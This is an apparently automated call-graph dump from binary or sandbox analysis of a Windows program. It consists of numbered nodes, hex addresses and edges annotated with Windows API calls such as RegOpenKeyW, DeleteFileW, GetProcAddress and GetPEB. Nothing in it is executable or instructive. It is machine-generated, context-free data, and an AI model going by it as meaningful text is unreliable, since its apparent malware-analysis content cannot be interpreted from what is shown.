409d36 8324->8337 8325->8317 8336 40945c 8443 40a35d 8336->8443 8338 409d43 8337->8338 8339 40a35d 4 API calls 8338->8339 8340 409d55 8339->8340 8341 4031e5 4 API calls 8340->8341 8342 409d8b 8341->8342 8343 4031e5 4 API calls 8342->8343 8344 409dd0 8343->8344 8345 405b6f 6 API calls 8344->8345 8376 409423 8344->8376 8348 409df7 8345->8348 8346 409e1c 8347 4031e5 4 API calls 8346->8347 8346->8376 8349 409e62 8347->8349 8348->8346 8350 402bab 2 API calls 8348->8350 8351 4031e5 4 API calls 8349->8351 8350->8346 8352 409e82 8351->8352 8353 4031e5 4 API calls 8352->8353 8354 409ea2 8353->8354 8355 4031e5 4 API calls 8354->8355 8356 409ec2 8355->8356 8357 4031e5 4 API calls 8356->8357 8358 409ee2 8357->8358 8359 4031e5 4 API calls 8358->8359 8360 409f02 8359->8360 8361 4031e5 4 API calls 8360->8361 8362 409f22 8361->8362 8363 4031e5 4 API calls 8362->8363 8366 409f42 8363->8366 8364 40a19b 8365 408b2c 4 API calls 8364->8365 8365->8376 8366->8364 8367 409fa3 8366->8367 8368 405b6f 6 API calls 8367->8368 8367->8376 8369 409fbd 8368->8369 8370 40a02c 8369->8370 8371 402bab 2 API calls 8369->8371 8372 4031e5 4 API calls 8370->8372 8398 40a16d 8370->8398 8374 409fd7 8371->8374 8375 40a070 8372->8375 8373 402bab 2 API calls 8373->8376 8377 405b6f 6 API calls 8374->8377 8378 4031e5 4 API calls 8375->8378 8376->8336 8399 4056bf 8376->8399 8380 409fe5 8377->8380 8379 40a090 8378->8379 8381 4031e5 4 API calls 8379->8381 8380->8370 8382 402bab 2 API calls 8380->8382 8383 40a0b0 8381->8383 8384 409fff 8382->8384 8387 4031e5 4 API calls 8383->8387 8385 405b6f 6 API calls 8384->8385 8386 40a00d 8385->8386 8386->8370 8389 40a021 8386->8389 8388 40a0d0 8387->8388 8391 4031e5 4 API calls 8388->8391 8390 402bab 2 API calls 8389->8390 8390->8376 8392 40a0f0 8391->8392 8393 4031e5 4 API calls 8392->8393 8394 40a110 8393->8394 8395 4031e5 4 API calls 8394->8395 8396 40a134 8394->8396 8395->8396 8396->8398 8453 408b2c 8396->8453 8398->8373 8398->8376 8400 402b7c 2 API calls 8399->8400 8402 4056cd 8400->8402 8401 4056d4 8404 408c4d 8401->8404 8402->8401 8403 402b7c 2 API calls 8402->8403 8403->8401 8405 413ba4 6 API calls 8404->8405 8406 408c5c 8405->8406 8407 408f02 8406->8407 8408 408f3a 8406->8408 8411 40903e 8406->8411 8410 405b6f 6 API calls 8407->8410 8409 405b6f 6 API calls 8408->8409 8425 408f51 8409->8425 8412 408f0c 8410->8412 8427 413aca 8411->8427 8412->8411 8416 408f31 8412->8416 8456 40a1b6 8412->8456 8414 405b6f 6 API calls 8414->8425 8415 402bab 2 API calls 8415->8411 8416->8415 8418 409031 8419 402bab 2 API calls 8418->8419 8419->8416 8420 409022 8421 402bab 2 API calls 8420->8421 8422 409028 8421->8422 8423 402bab 2 API calls 8422->8423 8423->8416 8424 402bab GetProcessHeap RtlFreeHeap 8424->8425 8425->8411 8425->8414 8425->8416 8425->8418 8425->8420 8425->8424 8426 40a1b6 14 API calls 8425->8426 8490 4044ee 8425->8490 8426->8425 8428 409451 8427->8428 8429 413ad7 8427->8429 8437 405695 8428->8437 8430 405781 4 API calls 8429->8430 8431 413af0 8430->8431 8432 405781 4 API calls 8431->8432 8433 413afe 8432->8433 8434 405762 4 API calls 8433->8434 8435 413b0e 8434->8435 8435->8428 8436 405781 4 API calls 8435->8436 8436->8428 8438 4056a0 8437->8438 8439 4056b9 8437->8439 8440 402bab 2 API calls 8438->8440 8439->8336 8441 4056b3 8440->8441 8442 402bab 2 API calls 8441->8442 8442->8439 8444 40a39a 8443->8444 8448 40a368 8443->8448 8445 4031e5 4 API calls 8444->8445 8447 40a3af 8444->8447 8445->8447 8446 40a3ca 8450 40a38a 8446->8450 8452 408b2c 4 API calls 8446->8452 8447->8446 8449 408b2c 4 API calls 8447->8449 8451 4031e5 4 API calls 8448->8451 8449->8446 8450->8325 8451->8450 8452->8450 8454 4031e5 4 API calls 8453->8454 8455 408b3e 8454->8455 8455->8398 8457 40a202 8456->8457 8458 40a1c3 8456->8458 8612 405f08 8457->8612 8460 405b6f 6 API calls 8458->8460 8462 40a1d0 8460->8462 8461 40a1fc 8461->8416 8462->8461 8463 40a1f3 8462->8463 8500 40a45b 8462->8500 8468 402bab 2 API calls 8463->8468 8465 40a333 8467 402bab 2 API calls 8465->8467 8467->8461 8468->8461 8469 405b6f 6 API calls 8471 40a245 8469->8471 8470 40a25d 8472 405b6f 6 API calls 8470->8472 8471->8470 8473 413a58 13 API calls 8471->8473 8478 40a26b 8472->8478 8474 40a257 8473->8474 8477 402bab 2 API calls 8474->8477 8475 40a28b 8476 405b6f 6 API calls 8475->8476 8484 40a297 8476->8484 8477->8470 8478->8475 8479 40a284 8478->8479 8619 40955b 8478->8619 8482 402bab 2 API calls 8479->8482 8480 40a2b7 8480->8465 8483 405b6f 6 API calls 8480->8483 8489 402bab 2 API calls 8480->8489 8636 4098a7 8480->8636 8482->8475 8483->8480 8484->8480 8485 40a2b0 8484->8485 8626 40968e 8484->8626 8486 402bab 2 API calls 8485->8486 8486->8480 8489->8480 8491 402b7c 2 API calls 8490->8491 8492 404512 8491->8492 8494 404585 GetLastError 8492->8494 8495 402bab 2 API calls 8492->8495 8498 402b7c 2 API calls 8492->8498 8499 40457c 8492->8499 8891 4044a7 8492->8891 8496 404592 8494->8496 8494->8499 8495->8492 8497 402bab 2 API calls 8496->8497 8497->8499 8498->8492 8499->8425 8645 40642c 8500->8645 8502 40a469 8503 40c4ff 8502->8503 8648 4047e6 8502->8648 8503->8463 8506 4040bb 12 API calls 8507 40bf88 8506->8507 8507->8503 8508 403c90 8 API calls 8507->8508 8509 40bfaa 8508->8509 8510 402b7c 2 API calls 8509->8510 8512 40bfc1 8510->8512 8511 40c4f3 8513 403f9e 5 API calls 8511->8513 8514 40c3aa 8512->8514 8655 40a423 8512->8655 8513->8503 8514->8511 8517 4056bf 2 API calls 8514->8517 8520 40c4e3 8514->8520 8515 402bab 2 API calls 8515->8511 8519 40c3d2 8517->8519 8519->8520 8522 4040bb 12 API calls 8519->8522 8520->8515 8521 405f08 4 API calls 8523 40c005 8521->8523 8524 40c3f3 8522->8524 8525 40c021 8523->8525 8658 40a43f 8523->8658 8527 40c4d1 8524->8527 8715 405a52 8524->8715 8526 4031e5 4 API calls 8525->8526 8529 40c034 8526->8529 8532 413aca 4 API calls 8527->8532 8538 4031e5 4 API calls 8529->8538 8533 40c4dd 8532->8533 8536 405695 2 API calls 8533->8536 8534 40c411 8720 405a87 8534->8720 8535 402bab 2 API calls 8535->8525 8536->8520 8544 40c04d 8538->8544 8539 40c4b3 8540 402bab 2 API calls 8539->8540 8542 40c4cb 8540->8542 8541 405a52 4 API calls 8552 40c423 8541->8552 8543 403f9e 5 API calls 8542->8543 8543->8527 8546 4031e5 4 API calls 8544->8546 8545 405a87 4 API calls 8545->8552 8547 40c085 8546->8547 8549 4031e5 4 API calls 8547->8549 8548 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8548->8552 8550 40c09c 8549->8550 8553 4031e5 4 API calls 8550->8553 8551 402bab 2 API calls 8551->8552 8552->8539 8552->8541 8552->8545 8552->8548 8552->8551 8554 40c0b3 8553->8554 8555 4031e5 4 API calls 8554->8555 8556 40c0ca 8555->8556 8557 4031e5 4 API calls 8556->8557 8558 40c0e7 8557->8558 8559 4031e5 4 API calls 8558->8559 8560 40c100 8559->8560 8561 4031e5 4 API calls 8560->8561 8562 40c119 8561->8562 8563 4031e5 4 API calls 8562->8563 8564 40c132 8563->8564 8565 4031e5 4 API calls 8564->8565 8566 40c14b 8565->8566 8567 4031e5 4 API calls 8566->8567 8568 40c164 8567->8568 8569 4031e5 4 API calls 8568->8569 8570 40c17d 8569->8570 8571 4031e5 4 API calls 8570->8571 8572 40c196 8571->8572 8573 4031e5 4 API calls 8572->8573 8574 40c1af 8573->8574 8575 4031e5 4 API calls 8574->8575 8576 40c1c8 8575->8576 8577 4031e5 4 API calls 8576->8577 8578 40c1de 8577->8578 8579 4031e5 4 API calls 8578->8579 8580 40c1f4 8579->8580 8581 4031e5 4 API calls 8580->8581 8582 40c20d 8581->8582 8583 4031e5 4 API calls 8582->8583 8584 40c226 8583->8584 8585 4031e5 4 API calls 8584->8585 8586 40c23f 8585->8586 8587 4031e5 4 API calls 8586->8587 8588 40c258 8587->8588 8589 4031e5 4 API calls 8588->8589 8590 40c273 8589->8590 8591 4031e5 4 API calls 8590->8591 8592 40c28a 8591->8592 8593 4031e5 4 API calls 8592->8593 8596 40c2d5 8593->8596 8594 40c3a2 8595 402bab 2 API calls 8594->8595 8595->8514 8596->8594 8597 4031e5 4 API calls 8596->8597 8598 40c315 8597->8598 8599 40c38b 8598->8599 8661 404866 8598->8661 8600 403c40 5 API calls 8599->8600 8602 40c397 8600->8602 8604 403c40 5 API calls 8602->8604 8604->8594 8605 40c382 8607 403c40 5 API calls 8605->8607 8607->8599 8609 406c4c 6 API calls 8610 40c355 8609->8610 8610->8605 8685 4126a7 8610->8685 8613 4031e5 4 API calls 8612->8613 8614 405f1d 8613->8614 8615 405f55 8614->8615 8616 402b7c 2 API calls 8614->8616 8615->8461 8615->8465 8615->8469 8615->8470 8617 405f36 8616->8617 8617->8615 8618 4031e5 4 API calls 8617->8618 8618->8615 8620 409673 8619->8620 8625 40956d 8619->8625 8620->8479 8621 408b45 6 API calls 8621->8625 8622 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8622->8625 8623 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8623->8625 8624 402bab GetProcessHeap RtlFreeHeap 8624->8625 8625->8620 8625->8621 8625->8622 8625->8623 8625->8624 8627 4040bb 12 API calls 8626->8627 8634 4096a9 8627->8634 8628 40989f 8628->8485 8629 409896 8630 403f9e 5 API calls 8629->8630 8630->8628 8632 408b45 6 API calls 8632->8634 8633 402bab GetProcessHeap RtlFreeHeap 8633->8634 8634->8628 8634->8629 8634->8632 8634->8633 8635 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8634->8635 8884 4059d8 8634->8884 8635->8634 8637 4040bb 12 API calls 8636->8637 8644 4098c1 8637->8644 8638 4099fb 8638->8480 8639 4099f3 8640 403f9e 5 API calls 8639->8640 8640->8638 8641 402bab GetProcessHeap RtlFreeHeap 8641->8644 8642 4059d8 4 API calls 8642->8644 8643 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8643->8644 8644->8638 8644->8639 8644->8641 8644->8642 8644->8643 8646 4031e5 4 API calls 8645->8646 8647 406441 GetNativeSystemInfo 8646->8647 8647->8502 8649 4031e5 4 API calls 8648->8649 8652 40480a 8649->8652 8650 40485d 8650->8503 8650->8506 8651 4031e5 4 API calls 8651->8652 8652->8650 8652->8651 8653 40484f 8652->8653 8654 403c40 5 API calls 8653->8654 8654->8650 8656 4031e5 4 API calls 8655->8656 8657 40a435 8656->8657 8657->8521 8659 4031e5 4 API calls 8658->8659 8660 40a451 8659->8660 8660->8535 8662 4031e5 4 API calls 8661->8662 8663 40487c 8662->8663 8663->8605 8664 406c4c 8663->8664 8725 4068eb 8664->8725 8666 406e02 8666->8609 8667 406cab 8737 40469b 8667->8737 8668 406c6c 8668->8666 8668->8667 8734 406894 8668->8734 8675 406df1 8676 40469b 4 API calls 8675->8676 8676->8666 8677 406cef 8677->8675 8678 4031e5 4 API calls 8677->8678 8679 406d26 8678->8679 8679->8675 8680 40771e 6 API calls 8679->8680 8684 406d57 8680->8684 8681 406da2 8682 4031e5 4 API calls 8681->8682 8682->8675 8684->8681 8750 4068b0 8684->8750 8686 4126bb 8685->8686 8687 4126d1 8685->8687 8689 412840 8686->8689 8806 40488c 8686->8806 8687->8689 8812 407055 8687->8812 8689->8605 8692 412837 8694 403c40 5 API calls 8692->8694 8694->8689 8696 41281e 8697 4070ff 6 API calls 8696->8697 8697->8692 8698 407055 6 API calls 8699 412742 8698->8699 8699->8696 8700 40719a 6 API calls 8699->8700 8701 41276e 8700->8701 8702 412804 8701->8702 8828 406f4a 8701->8828 8856 4070ff 8702->8856 8705 41279a 8834 412553 8705->8834 8878 405907 8715->8878 8717 405a61 8718 405a76 8717->8718 8719 405907 4 API calls 8717->8719 8718->8534 8719->8717 8721 402b7c 2 API calls 8720->8721 8722 405a99 8721->8722 8724 405ade 8722->8724 8881 40595e 8722->8881 8724->8552 8753 4076a8 8725->8753 8727 406913 8728 406a61 8727->8728 8729 40771e 6 API calls 8727->8729 8728->8668 8730 406949 8729->8730 8730->8728 8731 40771e 6 API calls 8730->8731 8732 404678 4 API calls 8730->8732 8759 4046c2 8730->8759 8731->8730 8732->8730 8735 4031e5 4 API calls 8734->8735 8736 4068a6 8735->8736 8736->8668 8738 4046b4 8737->8738 8739 4046a4 8737->8739 8738->8666 8741 404678 8738->8741 8740 4031e5 4 API calls 8739->8740 8740->8738 8742 4031e5 4 API calls 8741->8742 8743 40468b 8742->8743 8743->8666 8744 40771e 8743->8744 8745 407737 8744->8745 8749 407748 8744->8749 8746 407644 6 API calls 8745->8746 8747 407741 8746->8747 8748 406baa 6 API calls 8747->8748 8748->8749 8749->8677 8751 4031e5 4 API calls 8750->8751 8752 4068c2 8751->8752 8752->8684 8754 4076c1 8753->8754 8755 4076d2 8753->8755 8767 407644 8754->8767 8755->8727 8760 4046d3 8759->8760 8761 4046d9 8759->8761 8802 40464c 8760->8802 8763 404678 4 API calls 8761->8763 8766 4046e9 8761->8766 8763->8766 8764 404714 8764->8730 8765 40469b 4 API calls 8765->8764 8766->8764 8766->8765 8768 407653 8767->8768 8769 407661 8767->8769 8768->8769 8775 406a6b 8768->8775 8771 406baa 8769->8771 8772 406bbb 8771->8772 8774 406bc8 8771->8774 8772->8774 8783 407402 8772->8783 8774->8755 8779 406a81 8775->8779 8776 402b7c 2 API calls 8776->8779 8777 406b8b 8777->8769 8778 406894 4 API calls 8778->8779 8779->8776 8779->8777 8779->8778 8780 406b96 8779->8780 8781 402bab 2 API calls 8779->8781 8782 402bab 2 API calls 8780->8782 8781->8779 8782->8777 8784 407644 6 API calls 8783->8784 8785 407412 8784->8785 8786 402b7c 2 API calls 8785->8786 8793 407450 8785->8793 8787 407483 8786->8787 8788 402b7c 2 API calls 8787->8788 8787->8793 8790 4074ce 8788->8790 8789 4074da 8791 4068cc 2 API calls 8789->8791 8790->8789 8792 402b7c 2 API calls 8790->8792 8791->8793 8796 40751f 8792->8796 8793->8774 8794 40752b 8795 4068cc 2 API calls 8794->8795 8795->8789 8796->8794 8798 4068cc 8796->8798 8799 4068d6 8798->8799 8800 4068e3 8798->8800 8799->8800 8801 402bab GetProcessHeap RtlFreeHeap 8799->8801 8800->8794 8801->8800 8803 404666 8802->8803 8804 404659 8802->8804 8803->8761 8805 4031e5 4 API calls 8804->8805 8805->8803 8807 4047e6 5 API calls 8806->8807 8808 404897 8807->8808 8809 40489c 8808->8809 8864 4047c7 8808->8864 8809->8687 8813 40706f 8812->8813 8814 407084 8812->8814 8813->8814 8815 407644 6 API calls 8813->8815 8819 4070e4 8814->8819 8867 406fd2 8814->8867 8816 40707d 8815->8816 8818 406baa 6 API calls 8816->8818 8818->8814 8819->8692 8820 40719a 8819->8820 8821 4071b0 8820->8821 8825 4071c5 8820->8825 8822 407644 6 API calls 8821->8822 8821->8825 8823 4071be 8822->8823 8824 406baa 6 API calls 8823->8824 8824->8825 8826 406fd2 4 API calls 8825->8826 8827 407226 8825->8827 8826->8827 8827->8696 8827->8698 8829 406f64 8828->8829 8833 406f75 8828->8833 8830 407644 6 API calls 8829->8830 8831 406f6e 8830->8831 8832 406baa 6 API calls 8831->8832 8832->8833 8833->8705 8875 4060ac 8834->8875 8857 407116 8856->8857 8858 40712b 8856->8858 8857->8858 8859 407644 6 API calls 8857->8859 8861 406fd2 4 API calls 8858->8861 8863 407187 8858->8863 8860 407124 8859->8860 8862 406baa 6 API calls 8860->8862 8861->8863 8862->8858 8863->8696 8865 4031e5 4 API calls 8864->8865 8866 4047d9 8865->8866 8866->8687 8868 406fde 8867->8868 8869 407027 8868->8869 8870 4031e5 4 API calls 8868->8870 8869->8819 8871 406ffa 8870->8871 8872 4031e5 4 API calls 8871->8872 8873 407011 8872->8873 8874 4031e5 4 API calls 8873->8874 8874->8869 8876 4031e5 4 API calls 8875->8876 8877 4060bb 8876->8877 8877->8877 8879 4031e5 4 API calls 8878->8879 8880 40591a 8879->8880 8880->8717 8882 4031e5 4 API calls 8881->8882 8883 405971 8882->8883 8883->8722 8885 4031e5 4 API calls 8884->8885 8886 4059ed 8885->8886 8887 402b7c 2 API calls 8886->8887 8890 405a38 8886->8890 8888 405a16 8887->8888 8889 4031e5 4 API calls 8888->8889 8888->8890 8889->8890 8890->8634 8892 4031e5 4 API calls 8891->8892 8893 4044b9 8892->8893 8893->8492 9813 40a349 9814 4098a7 13 API calls 9813->9814 9815 40a359 9814->9815 9052 408952 9073 40823f 9052->9073 9055 408960 9057 4056bf 2 API calls 9055->9057 9058 40896a 9057->9058 9101 408862 9058->9101 9060 413aca 4 API calls 9061 4089d4 9060->9061 9063 405695 2 API calls 9061->9063 9062 408975 9070 4089c4 9062->9070 9109 4087d6 9062->9109 9065 4089df 9063->9065 9070->9060 9071 402bab 2 API calls 9072 40899d 9071->9072 9072->9070 9072->9071 9074 40824d 9073->9074 9075 40831b 9074->9075 9076 4031e5 4 API calls 9074->9076 9075->9055 9089 4083bb 9075->9089 9077 40826d 9076->9077 9078 4031e5 4 API calls 9077->9078 9079 408289 9078->9079 9080 4031e5 4 API calls 9079->9080 9081 4082a5 9080->9081 9082 4031e5 4 API calls 9081->9082 9083 4082c1 9082->9083 9084 4031e5 4 API calls 9083->9084 9085 4082e2 9084->9085 9086 4031e5 4 API calls 9085->9086 9087 4082ff 9086->9087 9088 4031e5 4 API calls 9087->9088 9088->9075 9137 408363 9089->9137 9092 4056bf 2 API calls 9098 4083f4 9092->9098 9093 413aca 4 API calls 9094 4084a0 9093->9094 9095 405695 2 API calls 9094->9095 9096 4084ab 9095->9096 9096->9055 9097 408492 9097->9093 9098->9097 9140 40815d 9098->9140 9155 40805d 9098->9155 9170 404b8f 9101->9170 9103 408946 9103->9062 9104 40887e 9104->9103 9105 4031e5 4 API calls 9104->9105 9106 40893e 9104->9106 9108 402b7c 2 API calls 9104->9108 9105->9104 9173 404a39 9106->9173 9108->9104 9110 402b7c 2 API calls 9109->9110 9111 4087e7 9110->9111 9112 4031e5 4 API calls 9111->9112 9117 40885a 9111->9117 9115 408802 9112->9115 9113 408853 9114 402bab 2 API calls 9113->9114 9114->9117 9115->9113 9118 40884d 9115->9118 9182 408522 9115->9182 9186 4084b4 9115->9186 9121 408749 9117->9121 9189 4084d4 9118->9189 9122 404b8f 5 API calls 9121->9122 9127 408765 9122->9127 9123 4087cf 9129 4085d1 9123->9129 9124 4031e5 4 API calls 9124->9127 9125 408522 4 API calls 9125->9127 9126 4087c7 9128 404a39 5 API calls 9126->9128 9127->9123 9127->9124 9127->9125 9127->9126 9128->9123 9130 4086c2 9129->9130 9131 4085e9 9129->9131 9130->9072 9131->9130 9133 402bab 2 API calls 9131->9133 9134 4031e5 4 API calls 9131->9134 9195 4089e6 9131->9195 9214 4086c9 9131->9214 9218 4036a3 9131->9218 9133->9131 9134->9131 9138 4031e5 4 API calls 9137->9138 9139 408386 9138->9139 9139->9092 9139->9096 9141 40816f 9140->9141 9142 4081b6 9141->9142 9143 4081fd 9141->9143 9154 4081ef 9141->9154 9145 405872 4 API calls 9142->9145 9144 405872 4 API calls 9143->9144 9146 408213 9144->9146 9147 4081cf 9145->9147 9148 405872 4 API calls 9146->9148 9149 405872 4 API calls 9147->9149 9151 408222 9148->9151 9150 4081df 9149->9150 9152 405872 4 API calls 9150->9152 9153 405872 4 API calls 9151->9153 9152->9154 9153->9154 9154->9098 9156 40808c 9155->9156 9157 4080d2 9156->9157 9158 408119 9156->9158 9169 40810b 9156->9169 9160 405872 4 API calls 9157->9160 9159 405872 4 API calls 9158->9159 9161 40812f 9159->9161 9162 4080eb 9160->9162 9164 405872 4 API calls 9161->9164 9163 405872 4 API calls 9162->9163 9165 4080fb 9163->9165 9166 40813e 9164->9166 9167 405872 4 API calls 9165->9167 9168 405872 4 API calls 9166->9168 9167->9169 9168->9169 9169->9098 9176 404a19 9170->9176 9172 404ba0 9172->9104 9179 4049ff 9173->9179 9175 404a44 9175->9103 9177 4031e5 4 API calls 9176->9177 9178 404a2c RegOpenKeyW 9177->9178 9178->9172 9180 4031e5 4 API calls 9179->9180 9181 404a12 RegCloseKey 9180->9181 9181->9175 9184 408534 9182->9184 9183 4085af 9183->9115 9184->9183 9192 4084ee 9184->9192 9187 4031e5 4 API calls 9186->9187 9188 4084c7 9187->9188 9188->9115 9190 4031e5 4 API calls 9189->9190 9191 4084e7 9190->9191 9191->9113 9193 4031e5 4 API calls 9192->9193 9194 408501 9193->9194 9194->9183 9196 4031e5 4 API calls 9195->9196 9197 408a06 9196->9197 9198 408b21 9197->9198 9199 4031e5 4 API calls 9197->9199 9198->9131 9202 408a32 9199->9202 9200 408b17 9230 403649 9200->9230 9202->9200 9221 403666 9202->9221 9205 4031e5 4 API calls 9207 408a88 9205->9207 9208 4031e5 4 API calls 9207->9208 9213 408b0e 9207->9213 9209 408ac4 9208->9209 9210 405b6f 6 API calls 9209->9210 9211 408aff 9210->9211 9211->9213 9224 408508 9211->9224 9227 40362f 9213->9227 9215 408744 9214->9215 9216 4086e2 9214->9216 9215->9131 9216->9215 9217 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 9216->9217 9217->9216 9219 4031e5 4 API calls 9218->9219 9220 4036b5 9219->9220 9220->9131 9222 4031e5 4 API calls 9221->9222 9223 403679 9222->9223 9223->9205 9223->9213 9225 4031e5 4 API calls 9224->9225 9226 40851b 9225->9226 9226->9213 9228 4031e5 4 API calls 9227->9228 9229 403642 9228->9229 9229->9200 9231 4031e5 4 API calls 9230->9231 9232 40365c 9231->9232 9232->9198 9833 40f252 9834 404bee 6 API calls 9833->9834 9835 40f269 9834->9835 9836 404bee 6 API calls 9835->9836 9847 40f2ff 9835->9847 9837 40f282 9836->9837 9838 404bee 6 API calls 9837->9838 9839 40f290 9838->9839 9850 404c4e 9839->9850 9841 40f2a7 9842 405872 4 API calls 9841->9842 9841->9847 9843 40f2cd 9842->9843 9844 405872 4 API calls 9843->9844 9845 40f2dc 9844->9845 9846 405872 4 API calls 9845->9846 9848 40f2ee 9846->9848 9849 405762 4 API calls 9848->9849 9849->9847 9851 402b7c 2 API calls 9850->9851 9853 404c60 9851->9853 9852 404ca4 9852->9841 9853->9852 9854 4031e5 4 API calls 9853->9854 9855 404c8d 9854->9855 9855->9852 9856 402bab 2 API calls 9855->9856 9856->9852 9857 41045c 9858 4040bb 12 API calls 9857->9858 9859 410477 9858->9859 9860 41060b 9859->9860 9888 407851 9859->9888 9862 41048f 9864 407851 2 API calls 9862->9864 9868 410604 9862->9868 9863 403f9e 5 API calls 9863->9860 9865 4104a9 9864->9865 9870 4105e0 9865->9870 9871 405ae9 6 API calls 9865->9871 9873 41056f 9865->9873 9874 4105eb 9865->9874 9866 402bab 2 API calls 9866->9868 9867 402bab 2 API calls 9869 4105fb 9867->9869 9868->9863 9869->9866 9872 402bab 2 API calls 9870->9872 9870->9874 9871->9865 9872->9874 9873->9870 9875 4105d6 9873->9875 9877 412269 6 API calls 9873->9877 9874->9867 9874->9869 9876 402bab 2 API calls 9875->9876 9876->9870 9878 410580 9877->9878 9878->9875 9879 405872 4 API calls 9878->9879 9880 410599 9879->9880 9881 405872 4 API calls 9880->9881 9882 4105a9 9881->9882 9883 405872 4 API calls 9882->9883 9884 4105bb 9883->9884 9885 405872 4 API calls 9884->9885 9886 4105cd 9885->9886 9887 402bab 2 API calls 9886->9887 9887->9875 9889 407866 9888->9889 9890 402b7c 2 API calls 9889->9890 9891 407899 9889->9891 9890->9891 9891->9862 9294 40f561 9297 40f4b6 9294->9297 9298 413b28 6 API calls 9297->9298 9299 40f4bf 9298->9299 9300 405b6f 6 API calls 9299->9300 9301 402bab GetProcessHeap RtlFreeHeap 9299->9301 9302 413a58 13 API calls 9299->9302 9303 40f559 9299->9303 9300->9299 9301->9299 9302->9299 9307 403b64 9308 4031e5 4 API calls 9307->9308 9309 403b77 PathFileExistsW 9308->9309 9923 40d069 9924 404bee 6 API calls 9923->9924 9925 40d080 9924->9925 9926 404bee 6 API calls 9925->9926 9948 40d1e2 9925->9948 9927 40d099 9926->9927 9928 404bee 6 API calls 9927->9928 9929 40d0a7 9928->9929 9964 404ba7 9929->9964 9932 404bee 6 API calls 9933 40d0c5 9932->9933 9934 404c4e 6 API calls 9933->9934 9935 40d0dc 9934->9935 9936 404bee 6 API calls 9935->9936 9937 40d0eb 9936->9937 9938 404ba7 4 API calls 9937->9938 9939 40d0fa 9938->9939 9940 404bee 6 API calls 9939->9940 9941 40d109 9940->9941 9942 404c4e 6 API calls 9941->9942 9943 40d123 9942->9943 9944 405872 4 API calls 9943->9944 9943->9948 9945 40d14a 9944->9945 9946 405872 4 API calls 9945->9946 9947 40d159 9946->9947 9949 405872 4 API calls 9947->9949 9950 40d16b 9949->9950 9951 405781 4 API calls 9950->9951 9952 40d179 9951->9952 9953 405872 4 API calls 9952->9953 9954 40d18b 9953->9954 9955 405762 4 API calls 9954->9955 9956 40d19f 9955->9956 9957 405872 4 API calls 9956->9957 9958 40d1b1 9957->9958 9959 405781 4 API calls 9958->9959 9960 40d1bf 9959->9960 9961 405872 4 API calls 9960->9961 9962 40d1d1 9961->9962 9963 405762 4 API calls 9962->9963 9963->9948 9965 4031e5 4 API calls 9964->9965 9966 404bca 9965->9966 9966->9932 9336 40f16e 9337 4056bf 2 API calls 9336->9337 9338 40f17b 9337->9338 9339 412093 20 API calls 9338->9339 9340 40f19e 9339->9340 9341 412093 20 API calls 9340->9341 9342 40f1b6 9341->9342 9343 412093 20 API calls 9342->9343 9344 40f1cc 9343->9344 9345 412093 20 API calls 9344->9345 9346 40f1e2 9345->9346 9347 413aca 4 API calls 9346->9347 9348 40f1ef 9347->9348 9349 405695 2 API calls 9348->9349 9350 40f1fa 9349->9350 9351 40ce71 9352 413b28 6 API calls 9351->9352 9353 40ce78 9352->9353 9354 405b6f 6 API calls 9353->9354 9355 40ce83 9354->9355 9359 40ceba 9355->9359 9362 403d74 19 API calls 9355->9362 9363 40cec1 9355->9363 9356 403fbf 7 API calls 9357 40cecc 9356->9357 9358 40cefb 9357->9358 9361 403d74 19 API calls 9357->9361 9360 402bab 2 API calls 9359->9360 9360->9363 9364 40cee7 9361->9364 9365 40cead 9362->9365 9363->9356 9366 40cef4 9364->9366 9369 402bab 2 API calls 9364->9369 9365->9359 9368 402bab 2 API calls 9365->9368 9367 402bab 2 API calls 9366->9367 9367->9358 9368->9359 9369->9366 9370 406472 9371 4031e5 4 API calls 9370->9371 9372 406484 Sleep 9371->9372 10040 40f204 10041 405781 4 API calls 10040->10041 10042 40f214 10041->10042 10043 4057df 13 API calls 10042->10043 10044 40f226 10043->10044 9430 403c08 9431 4031e5 4 API calls 9430->9431 9432 403c1a DeleteFileW 9431->9432 9433 410a09 9434 41219c 14 API calls 9433->9434 9435 410a1b 9434->9435 9436 41219c 14 API calls 9435->9436 9437 410a23 9436->9437 9438 41219c 14 API calls 9437->9438 9439 410a2c 9438->9439 9440 41219c 14 API calls 9439->9440 9441 410a38 9440->9441 9442 404b22 6 API calls 9441->9442 9443 410a4c 9442->9443 9444 403fbf 7 API calls 9443->9444 9450 410a7a 9443->9450 9445 410a5c 9444->9445 9446 410a71 9445->9446 9447 413a58 13 API calls 9445->9447 9448 402bab 2 API calls 9446->9448 9449 410a6b 9447->9449 9448->9450 9451 402bab 2 API calls 9449->9451 9451->9446 10045 410d09 10046 410d56 10045->10046 10047 410d17 10045->10047 10049 413a58 13 API calls 10046->10049 10061 406642 10047->10061 10051 410d6f 10049->10051 10052 4056bf 2 API calls 10053 410d2e 10052->10053 10074 405641 10053->10074 10055 410d41 10056 413aca 4 API calls 10055->10056 10057 410d4a 10056->10057 10058 405695 2 API calls 10057->10058 10059 410d50 10058->10059 10060 4036a3 4 API calls 10059->10060 10060->10046 10062 406662 10061->10062 10063 4031e5 4 API calls 10062->10063 10064 406676 10063->10064 10078 4066bf 10064->10078 10069 4066b1 10072 4036a3 4 API calls 10069->10072 10070 4066a7 10071 4036a3 4 API calls 10070->10071 10073 4066ac 10071->10073 10072->10073 10073->10046 10073->10052 10075 40564d 10074->10075 10076 405673 10074->10076 10075->10076 10077 4056fc 4 API calls 10075->10077 10076->10055 10077->10076 10079 4031e5 4 API calls 10078->10079 10080 4066dc 10079->10080 10081 4066f6 SetLastError 10080->10081 10082 406708 GetLastError 10080->10082 10099 406693 10081->10099 10083 406713 10082->10083 10082->10099 10084 4031e5 4 API calls 10083->10084 10085 406725 10084->10085 10086 4031e5 4 API calls 10085->10086 10085->10099 10087 40673f 10086->10087 10088 406753 10087->10088 10089 406749 10087->10089 10091 4031e5 4 API calls 10088->10091 10090 4036a3 4 API calls 10089->10090 10090->10099 10092 406761 10091->10092 10093 40678a 10092->10093 10094 40677c 10092->10094 10096 4036a3 4 API calls 10093->10096 10095 4036a3 4 API calls 10094->10095 10097 406781 10095->10097 10096->10099 10098 4036a3 4 API calls 10097->10098 10098->10099 10100 406455 10099->10100 10101 4031e5 4 API calls 10100->10101 10102 406468 10101->10102 10102->10069 